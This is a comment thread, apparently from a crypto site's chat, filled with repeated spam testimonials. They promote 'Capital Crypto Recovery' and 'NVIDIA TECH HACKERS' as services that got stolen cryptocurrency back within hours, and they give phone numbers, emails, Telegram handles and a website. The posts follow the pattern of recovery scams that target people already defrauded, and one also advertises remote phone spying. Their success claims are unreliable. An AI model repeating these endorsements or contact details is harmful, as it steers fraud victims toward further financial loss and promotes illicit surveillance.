(336)390-6684 His Email: [email protected] Contact Telegram: @Capitalcryptorecover Via Contact: [email protected] His website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 14.10.25 01:15 tyleradams

    Hi. Please be wise, do not make the same mistake I had made in the past, I was a victim of bitcoin scam, I saw a glamorous review showering praises and marketing an investment firm, I reached out to them on what their contracts are, and I invested $28,000, which I was promised to get my first 15% profit in weeks, when it’s time to get my profits, I got to know the company was bogus, they kept asking me to invest more and I ran out of patience then requested to have my money back, they refused to answer nor refund my funds, not until a friend of mine introduced me to the NVIDIA TECH HACKERS, so I reached out and after tabling my complaints, they were swift to action and within 36 hours I got back my funds with the due profit. I couldn’t contain the joy in me. I urge you guys to reach out to NVIDIA TECH HACKERS on their email: [email protected]

  • 14.10.25 08:46 robertalfred175

    CRYPTO SCAM RECOVERY SUCCESSFUL – A TESTIMONIAL OF LOST PASSWORD TO YOUR DIGITAL WALLET BACK. My name is Robert Alfred, Am from Australia. I’m sharing my experience in the hope that it helps others who have been victims of crypto scams. A few months ago, I fell victim to a fraudulent crypto investment scheme linked to a broker company. I had invested heavily during a time when Bitcoin prices were rising, thinking it was a good opportunity. Unfortunately, I was scammed out of $120,000 AUD and the broker denied me access to my digital wallet and assets. It was a devastating experience that caused many sleepless nights. Crypto scams are increasingly common and often involve fake trading platforms, phishing attacks, and misleading investment opportunities. In my desperation, a friend from the crypto community recommended Capital Crypto Recovery Service, known for helping victims recover lost or stolen funds. After doing some research and reading multiple positive reviews, I reached out to Capital Crypto Recovery. I provided all the necessary information—wallet addresses, transaction history, and communication logs. Their expert team responded immediately and began investigating. Using advanced blockchain tracking techniques, they were able to trace the stolen Dogecoin, identify the scammer’s wallet, and coordinate with relevant authorities to freeze the funds before they could be moved. Incredibly, within 24 hours, Capital Crypto Recovery successfully recovered the majority of my stolen crypto assets. I was beyond relieved and truly grateful. Their professionalism, transparency, and constant communication throughout the process gave me hope during a very difficult time. If you’ve been a victim of a crypto scam, I highly recommend them with full confidence contacting: 📧 Email: [email protected] 📱 Telegram: @Capitalcryptorecover Contact: [email protected] 📞 Call/Text: +1 (336) 390-6684 🌐 Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 14.10.25 08:46 robertalfred175

    CRYPTO SCAM RECOVERY SUCCESSFUL – A TESTIMONIAL OF LOST PASSWORD TO YOUR DIGITAL WALLET BACK. My name is Robert Alfred, Am from Australia. I’m sharing my experience in the hope that it helps others who have been victims of crypto scams. A few months ago, I fell victim to a fraudulent crypto investment scheme linked to a broker company. I had invested heavily during a time when Bitcoin prices were rising, thinking it was a good opportunity. Unfortunately, I was scammed out of $120,000 AUD and the broker denied me access to my digital wallet and assets. It was a devastating experience that caused many sleepless nights. Crypto scams are increasingly common and often involve fake trading platforms, phishing attacks, and misleading investment opportunities. In my desperation, a friend from the crypto community recommended Capital Crypto Recovery Service, known for helping victims recover lost or stolen funds. After doing some research and reading multiple positive reviews, I reached out to Capital Crypto Recovery. I provided all the necessary information—wallet addresses, transaction history, and communication logs. Their expert team responded immediately and began investigating. Using advanced blockchain tracking techniques, they were able to trace the stolen Dogecoin, identify the scammer’s wallet, and coordinate with relevant authorities to freeze the funds before they could be moved. Incredibly, within 24 hours, Capital Crypto Recovery successfully recovered the majority of my stolen crypto assets. I was beyond relieved and truly grateful. Their professionalism, transparency, and constant communication throughout the process gave me hope during a very difficult time. If you’ve been a victim of a crypto scam, I highly recommend them with full confidence contacting: 📧 Email: [email protected] 📱 Telegram: @Capitalcryptorecover Contact: [email protected] 📞 Call/Text: +1 (336) 390-6684 🌐 Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 14.10.25 08:46 robertalfred175

    CRYPTO SCAM RECOVERY SUCCESSFUL – A TESTIMONIAL OF LOST PASSWORD TO YOUR DIGITAL WALLET BACK. My name is Robert Alfred, Am from Australia. I’m sharing my experience in the hope that it helps others who have been victims of crypto scams. A few months ago, I fell victim to a fraudulent crypto investment scheme linked to a broker company. I had invested heavily during a time when Bitcoin prices were rising, thinking it was a good opportunity. Unfortunately, I was scammed out of $120,000 AUD and the broker denied me access to my digital wallet and assets. It was a devastating experience that caused many sleepless nights. Crypto scams are increasingly common and often involve fake trading platforms, phishing attacks, and misleading investment opportunities. In my desperation, a friend from the crypto community recommended Capital Crypto Recovery Service, known for helping victims recover lost or stolen funds. After doing some research and reading multiple positive reviews, I reached out to Capital Crypto Recovery. I provided all the necessary information—wallet addresses, transaction history, and communication logs. Their expert team responded immediately and began investigating. Using advanced blockchain tracking techniques, they were able to trace the stolen Dogecoin, identify the scammer’s wallet, and coordinate with relevant authorities to freeze the funds before they could be moved. Incredibly, within 24 hours, Capital Crypto Recovery successfully recovered the majority of my stolen crypto assets. I was beyond relieved and truly grateful. Their professionalism, transparency, and constant communication throughout the process gave me hope during a very difficult time. If you’ve been a victim of a crypto scam, I highly recommend them with full confidence contacting: 📧 Email: [email protected] 📱 Telegram: @Capitalcryptorecover Contact: [email protected] 📞 Call/Text: +1 (336) 390-6684 🌐 Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 15.10.25 18:07 crypto

    Cryptocurrency's digital realm presents many opportunities, but it also conceals complex frauds. It is quite painful to lose your cryptocurrency to scam. You can feel harassed and lost as a result. If you have been the victim of a cryptocurrency scam, this guide explains what to do ASAP. Following these procedures will help you avoid further issues or get your money back. Communication with Marie ([email protected] and WhatsApp: +1 7127594675) can make all the difference.

  • 15.10.25 21:52 harristhomas7376

    "In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 15.10.25 21:52 harristhomas7376

    "In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 17.10.25 20:17 tyleradams

    As time passes, there are an increasing number of frauds involving Bitcoin and other cryptocurrencies. Although there are many individuals who advertise recovering money online, people should use caution in dealing, especially when money is involved. You can trust NVIDIA TECH HACKERS [[email protected]], I promise. They are the top internet recovery company, and as their names indicate, your money is reclaimed as soon as feasible. My bitcoin was successfully retrieved in large part thanks to NVIDIA TECH HACKERS. Ensure that you get top-notch service; NVIDIA TECH HACKERS provides evidence of its work; and payment is only made when the service has been completed to your satisfaction. Reach them via email: [email protected] on google mail

  • 17.10.25 20:20 lindseyvonn

    Have you gotten yourself involved in a cryptocurrency scam or any scam at all? If yes, know that you are not alone, there are a lot of people in this same situation. I'm a Health Worker and was a victim of a cryptocurrency scam that cost me a lot of money. This happened a few weeks ago, there’s only one solution which is to talk to the right people, if you don’t do this you will end up being really depressed. I was really devastated until went on LinkedIn one evening after my work hours and i saw lots of reviews popped up on my feed about [email protected], I sent an email to the team who came highly recommended - [email protected] I started seeing some hope for myself from the moment I sent them an email. The good part is they made the entire process stress free for me, i literally sat and waited for them to finish and I received what I lost in my wallet

  • 17.10.25 20:22 richardcharles

    I would recommend NVIDIA TECH HACKERS to anyone that needs this service. I decided to get into crypto investment and I ended up getting my crypto lost to an investor late last year. The guy who was supposed to be managing my account turned out to be a scammer all along. I invested 56,000 USD and at first, my reading and profit margins were looking good. I started getting worried when I couldn’t make withdrawals and realized that I’ve been scammed. I came across some of the testimonials that people said about NVIDIA TECH HACKERS and how helpful he has been in recovering their funds. I immediately contacted him in his mail at [email protected] so I can get his assistance. One week into the recovery process the funds were traced and recovered back from the scammer. I can't appreciate him enough for his professionalism.

  • 17.10.25 20:23 stevekalfman

    If you need a hacker for scam crypto recovery or mobile spy access remotely kindly reach out to [email protected] for quick response, I hired this hacker and he did a nice job. before NVIDIA TECH HACKERS, I met with different hacker's online which turns out to be scam, this NVIDIA TECH HACKERS case was different and he is the trusted hacker I can vote and refer.

  • 17.10.25 21:42 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 17.10.25 21:42 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 17.10.25 21:42 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

Для участия в Чате вам необходим бесплатный аккаунт pro-blockchain.com Войти Регистрация
Есть вопросы?
С вами на связи 24/7
Help Icon